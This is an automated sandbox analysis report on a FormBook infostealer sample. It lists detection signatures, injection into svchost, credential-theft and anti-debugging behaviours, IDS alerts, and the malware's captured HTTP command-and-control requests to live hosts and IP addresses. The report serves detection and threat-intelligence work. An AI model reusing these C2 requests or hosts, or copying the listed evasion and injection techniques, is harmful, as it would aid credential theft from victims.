Edit tour

Windows Analysis Report
CJE003889.exe

Overview

General Information

Sample name:	CJE003889.exe
Analysis ID:	1572869
MD5:	701f58c31461426d9dd6fafcd8adcd33
SHA1:	ccdb3a9aec59affb20fb94e62bca9a52c5900618
SHA256:	d33029ee722e3376c49c3a557014f649afe3210c2b400336d9bf39062792dfd0
Tags:	exeFormbookuser-koluke
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

CJE003889.exe (PID: 6840 cmdline: "C:\Users\user\Desktop\CJE003889.exe" MD5: 701F58C31461426D9DD6FAFCD8ADCD33)

svchost.exe (PID: 4180 cmdline: "C:\Users\user\Desktop\CJE003889.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

mcPAaApkdo.exe (PID: 3568 cmdline: "C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

ROUTE.EXE (PID: 2536 cmdline: "C:\Windows\SysWOW64\ROUTE.EXE" MD5: C563191ED28A926BCFDB1071374575F1)

mcPAaApkdo.exe (PID: 5904 cmdline: "C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 6404 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.3491828564.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3491386703.00000000008B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2149646425.00000000039A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3491887739.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2142478185.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2150676929.0000000004C00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3490916220.00000000028F0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3491866393.0000000003530000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\CJE003889.exe", CommandLine: "C:\Users\user\Desktop\CJE003889.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CJE003889.exe", ParentImage: C:\Users\user\Desktop\CJE003889.exe, ParentProcessId: 6840, ParentProcessName: CJE003889.exe, ProcessCommandLine: "C:\Users\user\Desktop\CJE003889.exe", ProcessId: 4180, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\CJE003889.exe", CommandLine: "C:\Users\user\Desktop\CJE003889.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CJE003889.exe", ParentImage: C:\Users\user\Desktop\CJE003889.exe, ParentProcessId: 6840, ParentProcessName: CJE003889.exe, ProcessCommandLine: "C:\Users\user\Desktop\CJE003889.exe", ProcessId: 4180, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T04:50:45.119882+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49743	156.226.63.13	80	TCP
2024-12-11T04:51:06.514751+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49803	103.120.80.111	80	TCP
2024-12-11T04:51:21.719194+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49842	38.180.232.109	80	TCP
2024-12-11T04:51:36.729307+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49876	172.67.158.81	80	TCP
2024-12-11T04:51:51.917630+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49915	208.91.197.27	80	TCP
2024-12-11T04:52:06.804180+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49954	172.67.182.198	80	TCP
2024-12-11T04:52:21.917490+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49993	209.74.79.40	80	TCP
2024-12-11T04:52:37.334499+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50031	13.228.81.39	80	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T04:50:45.119882+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49743	156.226.63.13	80	TCP
2024-12-11T04:51:06.514751+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49803	103.120.80.111	80	TCP
2024-12-11T04:51:21.719194+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49842	38.180.232.109	80	TCP
2024-12-11T04:51:36.729307+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49876	172.67.158.81	80	TCP
2024-12-11T04:51:51.917630+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49915	208.91.197.27	80	TCP
2024-12-11T04:52:06.804180+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49954	172.67.182.198	80	TCP
2024-12-11T04:52:21.917490+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49993	209.74.79.40	80	TCP
2024-12-11T04:52:37.334499+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50031	13.228.81.39	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T04:50:58.497436+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49779	103.120.80.111	80	TCP
2024-12-11T04:51:01.162817+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49785	103.120.80.111	80	TCP
2024-12-11T04:51:03.835191+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49792	103.120.80.111	80	TCP
2024-12-11T04:51:13.697181+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49819	38.180.232.109	80	TCP
2024-12-11T04:51:16.397420+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49825	38.180.232.109	80	TCP
2024-12-11T04:51:19.144276+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49831	38.180.232.109	80	TCP
2024-12-11T04:51:28.700584+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49858	172.67.158.81	80	TCP
2024-12-11T04:51:31.372469+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49864	172.67.158.81	80	TCP
2024-12-11T04:51:34.028762+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49870	172.67.158.81	80	TCP
2024-12-11T04:51:43.656842+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49897	208.91.197.27	80	TCP
2024-12-11T04:51:46.298121+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49903	208.91.197.27	80	TCP
2024-12-11T04:51:48.968786+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49909	208.91.197.27	80	TCP
2024-12-11T04:51:58.789056+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49936	172.67.182.198	80	TCP
2024-12-11T04:52:01.448282+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49942	172.67.182.198	80	TCP
2024-12-11T04:52:04.122102+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49948	172.67.182.198	80	TCP
2024-12-11T04:52:13.920650+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49975	209.74.79.40	80	TCP
2024-12-11T04:52:16.585115+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49981	209.74.79.40	80	TCP
2024-12-11T04:52:19.304264+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49987	209.74.79.40	80	TCP
2024-12-11T04:52:29.278827+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50014	13.228.81.39	80	TCP
2024-12-11T04:52:31.935159+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50020	13.228.81.39	80	TCP
2024-12-11T04:52:34.606926+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50026	13.228.81.39	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: CJE003889.exe	ReversingLabs: Detection: 26%
Source: CJE003889.exe	Virustotal: Detection: 26%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3491828564.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3491386703.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2149646425.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3491887739.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2142478185.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2150676929.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3490916220.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3491866393.0000000003530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: CJE003889.exe

Joe Sandbox ML: detected

Source: CJE003889.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: route.pdb source: svchost.exe, 00000001.00000003.2110719309.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2142967619.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000005.00000002.3491468868.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mcPAaApkdo.exe, 00000005.00000000.2065667127.0000000000D0E000.00000002.00000001.01000000.00000005.sdmp, mcPAaApkdo.exe, 00000007.00000000.2215787915.0000000000D0E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: CJE003889.exe, 00000000.00000003.1677127987.0000000003640000.00000004.00001000.00020000.00000000.sdmp, CJE003889.exe, 00000000.00000003.1676009743.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2149702744.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2048458143.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2149702744.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2050143363.0000000003900000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2142320033.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2149642489.0000000002E5D000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492026833.00000000031AE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492026833.0000000003010000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: CJE003889.exe, 00000000.00000003.1677127987.0000000003640000.00000004.00001000.00020000.00000000.sdmp, CJE003889.exe, 00000000.00000003.1676009743.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2149702744.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2048458143.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2149702744.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2050143363.0000000003900000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000006.00000003.2142320033.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2149642489.0000000002E5D000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492026833.00000000031AE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492026833.0000000003010000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: ROUTE.EXE, 00000006.00000002.3491093928.0000000002A5E000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492415210.000000000363C000.00000004.10000000.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2435967367.0000000016C4C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: route.pdbGCTL source: svchost.exe, 00000001.00000003.2110719309.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2142967619.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000005.00000002.3491468868.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: ROUTE.EXE, 00000006.00000002.3491093928.0000000002A5E000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492415210.000000000363C000.00000004.10000000.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2435967367.0000000016C4C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CC445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00CC445A
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CCC6D1 FindFirstFileW,FindClose,	0_2_00CCC6D1
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CCC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00CCC75C
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CCEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00CCEF95
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CCF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00CCF0F2
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CCF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00CCF3F3
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CC37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00CC37EF
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CC3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00CC3B12
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CCBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00CCBCBC
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0290CB20 FindFirstFileW,FindNextFileW,FindClose,	6_2_0290CB20

Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 4x nop then xor eax, eax		6_2_028F9E80
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 4x nop then mov ebx, 00000004h		6_2_02EF04DF

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49792 -> 103.120.80.111:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49842 -> 38.180.232.109:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49842 -> 38.180.232.109:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49779 -> 103.120.80.111:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49785 -> 103.120.80.111:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49743 -> 156.226.63.13:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49803 -> 103.120.80.111:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49803 -> 103.120.80.111:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49825 -> 38.180.232.109:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49831 -> 38.180.232.109:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49819 -> 38.180.232.109:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49743 -> 156.226.63.13:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49864 -> 172.67.158.81:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49876 -> 172.67.158.81:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49876 -> 172.67.158.81:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49858 -> 172.67.158.81:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49870 -> 172.67.158.81:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49897 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49903 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49915 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49915 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49936 -> 172.67.182.198:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49942 -> 172.67.182.198:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49909 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49948 -> 172.67.182.198:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49975 -> 209.74.79.40:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49981 -> 209.74.79.40:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49987 -> 209.74.79.40:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49954 -> 172.67.182.198:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49954 -> 172.67.182.198:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50014 -> 13.228.81.39:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49993 -> 209.74.79.40:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49993 -> 209.74.79.40:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 13.228.81.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 13.228.81.39:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50031 -> 13.228.81.39:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50031 -> 13.228.81.39:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.313333.xyz
Source:	DNS query: www.313333.xyz

Source: Joe Sandbox View	IP Address: 103.120.80.111 103.120.80.111
Source: Joe Sandbox View	IP Address: 208.91.197.27 208.91.197.27

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00CD22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00CD22EE

Source: global traffic	HTTP traffic detected: GET /0qmw/?gnlxDxt=278+fPNRLmRxSvCH34hbLODYmABWu8vkjuqqbvjl/R4r9MC/xh0rLSqKPcdQtIyz70t8P1XMFdXw2YmeVp9Igz5U6icI9PUQLWv4eV+o4CclGEV4ym29rSk=&Cpbp2=zjh46zEHi HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.wuyyv4tq.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
Source: global traffic	HTTP traffic detected: GET /5jna/?gnlxDxt=o8GwGASYBJt/nb/piMB5DNiJPc8rJicYda1NcmeQznd2DA1k1E5AtP7RU4WuyFuLPAN95z5B1yv6cgM9wMfZloOraKLvaksg7S1pHUhIybvdcNjqXcBCCD0=&Cpbp2=zjh46zEHi HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.313333.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
